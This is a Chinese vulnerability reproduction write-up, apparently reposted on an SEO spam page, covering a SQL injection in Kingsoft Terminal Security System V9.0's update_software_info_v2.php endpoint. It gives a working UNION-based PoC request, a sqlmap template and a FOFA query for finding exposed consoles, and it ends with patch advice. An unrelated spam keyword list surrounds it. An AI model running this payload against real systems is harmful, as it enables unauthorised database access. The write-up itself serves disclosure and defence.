当前位置: 首页 > news >正文

中国最厉害的网站建设公司合肥seo推广培训班

中国最厉害的网站建设公司,合肥seo推广培训班,专做蔬菜大棚的网站,网站建设续费是什么费用0x01 产品简介 金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。 0x02 漏洞概述 金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞,该…

0x01 产品简介

     金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。

0x02 漏洞概述

    金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞,该漏洞是由于金山终端安全系统未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。

0x03 影响范围

 金山终端安全系统<V9.SP1.E1008

0x04 复现环境

FOFA:title=="用户登录-金山终端安全系统V9.0Web控制台"

0x05 漏洞复现

PoC

POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedtype=-1+UNION+SELECT+1,user(),3,4,5,6,7,8--&key=&pageCount=0&curPage=

查询当前用户

延时注入

Sqlmap验证 

数据包放txt里面

POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedtype=-100*&key=&pageCount=0&curPage=

0x06 修复建议 

升级修复方案

官方已经推出了新版本修复了漏洞。建议所有受影响的用户尽快访问官方网站,更新版本至新版本。https://www.ejinshan.net/lywz/index

临时缓解方案

通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。另外作为安全建议,不要将集权设备的Web管理控制台开放在互联网上,并且仅允许可信IP进行访问。

http://www.mmbaike.com/news/78807.html

相关文章:

  • 网站构成的作用是什么世界十大网站排名
  • 神箭手 wordpress成都seo网络优化公司
  • 网上去哪里找做网站的浏览器下载安装2022最新版
  • 盐城网站优化工作室如何做优化排名
  • 做B2B网站需要办理什么关键词有哪些
  • 招聘网站分析报告怎么做网站建设方案设计书
  • 游戏运营备案官方网站整合营销活动策划方案
  • 做的网站图片模糊有什么平台可以发布推广信息
  • wordpress里的小工具seo小白入门
  • 火狐网站开发好的插件宁波seo公司哪家好
  • 江西省建设监督网站济南百度推广优化
  • 直播网站可以做毕设吗郑州官网网站推广优化公司
  • 做暖暖视频网站观看夸克搜索引擎入口
  • 建设独立服务器网站成人短期培训能学什么
  • 成都建筑设计公司排名前十优化师培训
  • 专业做家居的网站有哪些谷歌怎么推广自己的网站
  • 新浪微博可以做网站吗各引擎收录查询
  • 重庆推广网站排名价格公司宣传软文
  • 淘宝客怎么做网站管理足球世界排名前十
  • 银行内部网站建设建议免费b站推广软件
  • 网站主流服务器语言精品成品网站1688
  • 网页设计网站名称营销策略ppt
  • 专业网站建设需要多少钱百度竞价推广有哪些优势
  • 腾讯云 wordpress建站目前最好的引流推广方法
  • 甘肃党风廉政建设办网站美国最新消息今天 新闻
  • 网站开发设计的技术网站标题算关键词优化吗
  • 大连建设银行社会招聘网站武汉网络推广有哪些公司
  • 材料信息价查询网站营销网络的建设有哪些
  • 南宁营销型网站设计培训机构营业执照如何办理
  • 柯基合肥全网优化